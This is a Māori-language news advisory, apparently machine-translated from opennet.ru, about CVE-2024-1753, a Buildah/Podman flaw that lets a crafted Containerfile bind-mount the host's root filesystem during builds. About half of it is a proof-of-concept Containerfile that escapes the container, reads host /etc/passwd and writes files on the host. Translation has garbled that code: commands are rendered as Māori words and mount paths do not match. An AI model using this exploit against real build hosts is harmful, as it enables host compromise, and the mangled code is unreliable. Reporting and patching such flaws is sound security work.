Kua kitea he ngoikoretanga (CVE-2024-1753) i roto i ngā mōkihi Buildah me Podman, e āhei ai te urunga katoa ki te pūnaha kōnae o te taiao manaaki i te wā hanga o tētahi ipu e whakahaeretia ana me ngā mana pakiaka. Mō ngā pūnaha kua whakahohea te SELinux Ko te urunga ki te pūnaha kōnae manaaki he aratau pānui-anake anake. Kei te wātea te whakatikatika i tēnei wā hei papaki, i whakaaetia tata nei ki roto i te pūtake waehere Buildah.
Ko te whakaraeraetanga na te mea i te wa e whakapuru ana i nga waahanga o te punaha konae ma te whakamahi i te whakahau "mount —bind" i te wa e hanga ana i te wahanga RUN, karekau te tautohetohe me te raarangi puna (te "puna =" tawhā) karekau kia tirohia. mena kei roto i te punaha konae pakiaka. Ka taea e te konae whirihoranga konae konae i hangaia e te kaitukino te whakamahi i te ahua ipu e whakahōputuhia ai te whaiaronga maunga puna hei hononga tohu ki te punaha konae pakiaka. I tenei keehi, ko te mahi a te maunga ka arahi ki te whakauru i te punaha konae pakiaka o te taiao manaaki i roto i te ipu, ka taea i te waahi RUN te uru katoa ki te punaha konae o te taiao manaaki me te whakarite i te putanga mai i te ipu i te waa hanga ma te whakamahi i nga whakahau "buildah build" ranei "podman build".
He tauira o te Containerfile kino, i hangaia me te whakahau "podman build -f ~/Containerfile ." ka whakaatu i nga ihirangi o /etc/passwd me te hanga i nga konae /BIND_BREAKEOUT me /etc/BIND_BREAKOUT2 i roto i te taiao manaaki: FROM alpine as base RUN ln -s / /rootdir RUN ln -s /etc /etc2 FROM alpine RUN echo “ls pakiaka ipu " RUN ls -l / RUN echo "Ma te whakamahi whakaatu i te pakiaka ope, kaua ko te pakiaka o te ipu, me te hanga /BIND_BREAKOUT ki roto / ki runga i te ope" RUN —mount=type=bind,from=base,source=/rootdir,destination =/ whakamahi,rw ls -l /whakamahi; pa ki /exploit/BIND_BREAKOUT; ls -l /exploit RUN echo "Ma te whakamahi i te kaihautu whakaatu /etc/passwd, kaua ko te ipu, ka waihanga /BIND_BREAKOUT2 ki /etc i runga i te kaihautu" RUN —mount=type=bind,rw,source=/etc2,destination=/ etc2,mai=turanga ls -l /; ls -l /etc2/passwd; ngeru /etc2/passwd; pa /etc2/BIND_BREAKOUT2; ls -l /etc2
Source: opennet.ru
